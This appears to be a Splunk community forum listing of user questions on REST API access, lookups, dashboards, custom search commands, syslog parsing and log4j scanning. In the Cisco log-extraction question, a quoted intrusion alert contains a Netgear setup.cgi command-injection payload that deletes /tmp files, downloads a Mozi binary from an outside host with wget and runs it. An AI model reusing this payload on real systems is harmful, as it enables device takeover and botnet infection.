All Topics

Find Answers
Ask questions. Get answers. Find technical product solutions from passionate members of the Splunk community.

All Topics

1. How can a non admin user access Splunk REST APIs? 2. After getting session key, search id and search status we are trying to get search results. But it is showing null.   curl -u $user:$password... See more...
1. How can a non admin user access Splunk REST APIs? 2. After getting session key, search id and search status we are trying to get search results. But it is showing null.   curl -u $user:$password -k https://localhost:8089/servicesNS/admin/search/search/jobs/sid/results/ --get   Any comments are much appreciated.  Thank you
Cisco logs with json format is not extracting properly. I tried from GUI using this kv delims in search and they are working fine. | kv pairdelim="," kvdelim="=:" But how can i save them?. Or do we... See more...
Cisco logs with json format is not extracting properly. I tried from GUI using this kv delims in search and they are working fine. | kv pairdelim="," kvdelim="=:" But how can i save them?. Or do we have any alternate way to extract these fields. 2022-01-31T13:11:20.233100-05:00 prd-vswnfa.bbtnet.com {"source": "cisco_nfa", "time": "2022-01-31 16:26:47+00:00", "alert": "http-shell-cmd", "tactic": "Initial Access", "ttp": "Exploit Public-Facing Application", "flow_id": "13847779", "app": "HTTP", "user": "", "s_hg": "China,CHINA UNICOM China169 Backbone", "s_ip": "125.46.191.152", "s_port": 41007, "s_bytes": 245, "s_payload": "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://125.46.191.152:39222/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1", "p_hg": "Public Space BBT", "p_ip": "74.120.69.217", "p_port": 80, "p_bytes": 303, "p_payload": "301 301 Moved Permanently"} 2022-01-31T13:11:20.202060-05:00 prd-vswnfa.bbtnet.com {"source": "cisco_nfa", "time": "2022-01-31 14:28:58+00:00", "alert": "log4j-shell-recon", "tactic": "Reconnaissance", "ttp": "Gather Victim Host Information", "flow_id": "13842059", "app": "HTTPS", "user": "", "s_hg": "Log4j Watchlist,Brute Force,Apache,Germany,Tor IP,Tor Exit IP", "s_ip": "185.220.101.157", "s_port": 9390, "s_bytes": 820, "s_payload": "............,.lb....Z.....", "p_hg": "Public Space BBT", "p_ip": "74.120.69.238", "p_port": 443, "p_bytes": 1460, "p_payload": "...m..J..4.v.A....\"FJ...:."}
Hey Splunkers. Quick question regarding my lookup. I have the Identity lookup with ES and I'd like to replace the 'priority' column value with the value in a separate lookup. For example, my (abbrev... See more...
Hey Splunkers. Quick question regarding my lookup. I have the Identity lookup with ES and I'd like to replace the 'priority' column value with the value in a separate lookup. For example, my (abbreviated) identity lookup looks like this:     identity prefix nick priority ------ ------ ------- --------- asmith (blank) Adam Smith medium cjean (blank) Carol Jean medium bjean (blank) Billy Jean medium     I'd like to replace the priority value 'medium' in the above lookup with the value that matches my separate lookup that looks like:     identity priority ------ --------- asmith high cjean low     So the original lookup would look like:     identity prefix nick priority ------ ------ ------- --------- asmith (blank) Adam Smith high cjean (blank) Carol Jean low bjean (blank) Billy Jean medium     I'm having trouble getting started on the search. How would I do this so that matches are updated but if no match is present than keep the original value? Thanks!
I made a custom TA in "/opt/splunk/etc/apps/myTA/". I created a script called "myTA/bin/scripts/pulldata.sh". My script makes temp files and it attempts to save in "myTA/bin/scripts/", but it has err... See more...
I made a custom TA in "/opt/splunk/etc/apps/myTA/". I created a script called "myTA/bin/scripts/pulldata.sh". My script makes temp files and it attempts to save in "myTA/bin/scripts/", but it has errors writing to that path. I can run the script in CLI using "./pulldata.sh" as the splunk user and it is fine to write the temp files to the "scripts" directory. I tried to use "/opt/splunk/bin/splunk cmd /opt/splunk/etc/apps/myTA/scripts/pulldata.sh", but that also has issues writing the temp files. I'm assuming that Splunk only lets the scripts write files in specific directories. Is there a specific/correct location that I should be placing these temp files? I'm thinking I can write to "/opt/splunk/var/log/splunk", but I want to see what the Splunk recommended path if for this kind of stuff . I remember seeing information about this at some point on dev.splunk.com, but can't seem to find it anymore. This is what I have been looking at: https://dev.splunk.com/enterprise/docs/developapps/createapps/appanatomy/ Thanks in advance!
I have a dashboard (form) where I have a dropdown to choose between two different types of "changes" that may have happened in one of our environments.  When one of the dropdowns is chosen, a table i... See more...
I have a dashboard (form) where I have a dropdown to choose between two different types of "changes" that may have happened in one of our environments.  When one of the dropdowns is chosen, a table is populated with results. The dropdown menu is configured: <choice value="index=something blah blah blah | table 1 2 3">Config Change</choice> <choice value="index=another_index blah blah blah | table 7 8 9">Admin Change</choice> The table portion is configured: <query>$tok_change$</query> This all works great.  I have a need to eval a field called Name in the Config Change "choice".  This Name field will have a value of "A change to the system was made." The comes in when I add the following to the SPL: eval Name="A change to the system was made" I receive the following message: "Error on line 8: Invalid attribute name" I figure it has something to do with the quote in the eval statement but I can't make this happen.  Any help / guidance is greatly appreciated.  
We re trying to iterate results rows and columns in the same order as the table before the custom command, the 'records' object in the custom command code iterates in order by row, but changes the or... See more...
We re trying to iterate results rows and columns in the same order as the table before the custom command, the 'records' object in the custom command code iterates in order by row, but changes the order of the columns.   def reduce(self, records): for record in records: yield record   This example of the reduce method of a ReportingCommand prints the results in a different column order than the original search. We need to iterate 'records' in the same order of rows and columns. Any ideas?
Ive uploaded the Splunk tutorial data successfully into my Splunk enterprise instance.  There is also a prices.csv.zip. Do I upload that file the exact same way as the tutorialdata.zip?
I am currently using the Splunk TA for Palo Alto data.  And I'm ingesting data from Cortex Data Lake to a new Azure Syslog server. But there is a large problem with the data we're ingesting.  The da... See more...
I am currently using the Splunk TA for Palo Alto data.  And I'm ingesting data from Cortex Data Lake to a new Azure Syslog server. But there is a large problem with the data we're ingesting.  The data being sent is literally missing a single field.  Below is a reference of what we should be ingesting: Configuration Syslog Field Order (paloaltonetworks.com) If you look at the example from this link, you will see this log:   Oct 13 20:56:15 gke-standard-cluster-2-pool-1-6ea9f13a-fnid 394 <142>1 2020-10-13T20:56:15.519Z stream-logfwd20-156653024-10121421-eq28-harness-16kn logforwarder - panwlogs - 1,​2020-10-13T20:56:03.000000Z,​007051000113358,​CONFIG,​config,​,​2020-10-13T20:56:00.000000Z,​xxx.xx.x.xx,​,​rename,​admin,​,​submitted,​/config/shared/log-settings/globalprotect/match-list/entry[@name='rs-globalprotect'],​150,​-9223372036854775808,​0,​0,​0,​0,​,​PA-VM,​,​,​,​2020-10-13T20:56:00.284000Z But what I'm receiving is: Oct 13 20:56:15 gke-standard-cluster-2-pool-1-6ea9f13a-fnid 394 <142>1 2020-10-13T20:56:15.519Z stream-logfwd20-156653024-10121421-eq28-harness-16kn logforwarder - panwlogs - ​2020-10-13T20:56:03.000000Z,​007051000113358,​CONFIG,​config,​,​2020-10-13T20:56:00.000000Z,​xxx.xx.x.xx,​,​rename,​admin,​,​submitted,​/config/shared/log-settings/globalprotect/match-list/entry[@name='rs-globalprotect'],​150,​-9223372036854775808,​0,​0,​0,​0,​,​PA-VM,​,​,​,​2020-10-13T20:56:00.284000Z In the log I'm receiving, I'm missing a comma (,) before the 2020 in this line: harness-16kn logforwarder - panwlogs - ​2020-10-13T20:56:03.000000Z   I should be receiving data that looks like this:   harness-16kn logforwarder - panwlogs - 1,​2020-10-13T20:56:03.000000Z   I'm at a loss where this data is generated.  If this is data generated by a syslog server, the unix server hosting syslog, or if it's on the Palo Alto Cortex Data Lake side of things. The logs are passed through our firewall and towards the syslog server.   I believe this field is either 'log_source_id' or 'log_type.value'.  But outside of that, I'm at a loss as to where this value is generated.  Any help is appreciated.   - TitanAE    
The python debugger in the Splunk Extension does not work when debugging a custom command (reporting command). It runs fine without the debugger, but when using the debugger it crashes at the dispatc... See more...
The python debugger in the Splunk Extension does not work when debugging a custom command (reporting command). It runs fine without the debugger, but when using the debugger it crashes at the dispatch() function and returns the following traceback:   Traceback (most recent call last): File "/opt/splunk/etc/apps/<app>/bin/<command>.py", line 149, in <module> dispatch(exportExcel, sys.argv, sys.stdin, sys.stdout, __name__) File "/opt/splunk/etc/apps/<app>/bin/../lib/splunklib/searchcommands/search_command.py", line 1144, in dispatch command_class().process(argv, input_file, output_file, allow_empty_input) File "/opt/splunk/etc/apps/<app>/bin/../lib/splunklib/searchcommands/search_command.py", line 450, in process self._process_protocol_v2(argv, ifile, ofile) File "/opt/splunk/etc/apps/<app>/bin/../lib/splunklib/searchcommands/search_command.py", line 788, in _process_protocol_v2 self._record_writer.write_metadata(self._configuration) File "/opt/splunk/etc/apps/<app>/bin/../lib/splunklib/searchcommands/internals.py", line 813, in write_metadata self._write_chunk(metadata, '') File "/opt/splunk/etc/apps/<app>/bin/../lib/splunklib/searchcommands/internals.py", line 843, in _write_chunk self.write(start_line) File "/opt/splunk/etc/apps/<app>/bin/../lib/splunklib/searchcommands/internals.py", line 557, in write self.ofile.write(data) File "/opt/splunk/etc/apps/SA-VSCode/bin/ptvsd/_vendored/pydevd/_pydevd_bundle/pydevd_io.py", line 40, in write r.write(s) TypeError: write() argument must be str, not bytes   The custom running code is similar to the python examples in the SDK repo in: https://github.com/splunk/splunk-sdk-python/tree/master/examples/searchcommands_app/package/bin Any help ll be appreciated.
We have upgraded from 8.1.6 to 8.1.7.2 and we are not able to see the resource details in the overview page. PFA screenshot. Kindly advise. Is this known issue ? 
Hi, i looked for an answer an some came close. But i could not get it flying. Here is the Problem Description: I have a field that contains the status of a ticket ("created_done"). I can easily c... See more...
Hi, i looked for an answer an some came close. But i could not get it flying. Here is the Problem Description: I have a field that contains the status of a ticket ("created_done"). I can easily count the number using by or doing that: | stats count(eval(created_done="created")) as created count(eval(created_done="done")) as done by title impact However i would like something like this: | stats count by title impact status status at this point should be a field holding the sum of solved tickets and the sum of open tickets: Title Impact Status Count title 1 impact 1 solved 90 title 1 impact 1 open 5 title 1 impact 2 solved 45 title 1 impact 2 open 3   Probably this has already been answered, i apologize in advance, but i could not get any solution working.   Kind regards, Mike
every time I modify my Pass4symm key in outputs.conf needed to forward to a different Splunk environment it ends up getting rewritten to the pass4symm key that is in the server.conf    how do I set... See more...
every time I modify my Pass4symm key in outputs.conf needed to forward to a different Splunk environment it ends up getting rewritten to the pass4symm key that is in the server.conf    how do I set a pass4symm key to 2 different keys one for my Splunk environment and one to other environment i need to forward logs to  
Hi all, During a scan of our infra, our system detected that in splunk version 8.1.7.1 , there is still present log4j library vulnerable to CVE-2021-44228. prior to the upgrade to this version we de... See more...
Hi all, During a scan of our infra, our system detected that in splunk version 8.1.7.1 , there is still present log4j library vulnerable to CVE-2021-44228. prior to the upgrade to this version we deleted the compromised files following the workaround in the Splunk Blog about this topic. As this version has that vulnerability patched, I´d like to know how the process works, as there are log4j files in the affected version present. Thanks in advance for your help. Best regards.
Hi Splunkers, Is it feasible to collect data from a DB2/AS400 server using Splunk? i.e. to collect required data which is stored in a database (DB2 Database) hosted on a AS400 server.   Thanks in... See more...
Hi Splunkers, Is it feasible to collect data from a DB2/AS400 server using Splunk? i.e. to collect required data which is stored in a database (DB2 Database) hosted on a AS400 server.   Thanks in Advance! Cheers!   
Hello,  Can anybody recommend an Add-on for finding reputation of an IP  in search results ? With High hopes , i downloaded the Virustotal app https://splunkbase.splunk.com/app/4283/#/details , bu... See more...
Hello,  Can anybody recommend an Add-on for finding reputation of an IP  in search results ? With High hopes , i downloaded the Virustotal app https://splunkbase.splunk.com/app/4283/#/details , but was disappointed to find out that it does not show reputation score for an IP field.  It does show for File hashes, Domain and URLs but not IPs.   Requirement is for a TA or add-on that we can use in our  own searches and get the ip reputation as a field in the results
I added a new index to my enterprise server, but on the indexer I cannot add it because it will not allow me to select the custom app.
Hi, I have requirement like the drilldown panel query should be changed based on the token value passed from the parent panel right now the condition is I have a parent panel token which may pass e... See more...
Hi, I have requirement like the drilldown panel query should be changed based on the token value passed from the parent panel right now the condition is I have a parent panel token which may pass either SUCCESS or FAILURE as value If it FAILURE the drilldown panel should execute different query and for SUCCESS it should execute different one
I got the 'Phantom Community Edition - Access Granted' mail. But regi link was expired. I can't access. https://my.phantom.us/registration_complete?token=ogxEhOMPccGvtrxBBIES6bhs61fpIdDspcGa2lyca... See more...
I got the 'Phantom Community Edition - Access Granted' mail. But regi link was expired. I can't access. https://my.phantom.us/registration_complete?token=ogxEhOMPccGvtrxBBIES6bhs61fpIdDspcGa2lyca44w4opts6XQuEzTA3WQDJFY Could you send the new link?
I want to limit the search that matches the "dest" values which are a part of lookup Currently I am getting all events Lookup: host.csv  lookup columns: aa bb I tried something like below: ... See more...
I want to limit the search that matches the "dest" values which are a part of lookup Currently I am getting all events Lookup: host.csv  lookup columns: aa bb I tried something like below:    |tstats summariesonly=f count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (condition)[|inputlookup host.csv |fields + aa |rename aa as Processes.dest] by Processes.dest     Any help would be appreciated! Thanks
I want to have a search, the output of which is the next search stream, provided that each occurred at a common time. For example: from a source with a specific port is connected to several destinat... See more...
I want to have a search, the output of which is the next search stream, provided that each occurred at a common time. For example: from a source with a specific port is connected to several destinations, and then the search destinations are the first source of the next search, provided that each occurred at the same time. search1: index=fgt src=172.26.122.1 dest_port=443 (dest=172.20.120.1 OR dest=172.20.120.2) | stats count by src,dest,_time search 2: search1 (src=172.20.120.1 OR src=172.20.120.2) | stats count by src,dest,_time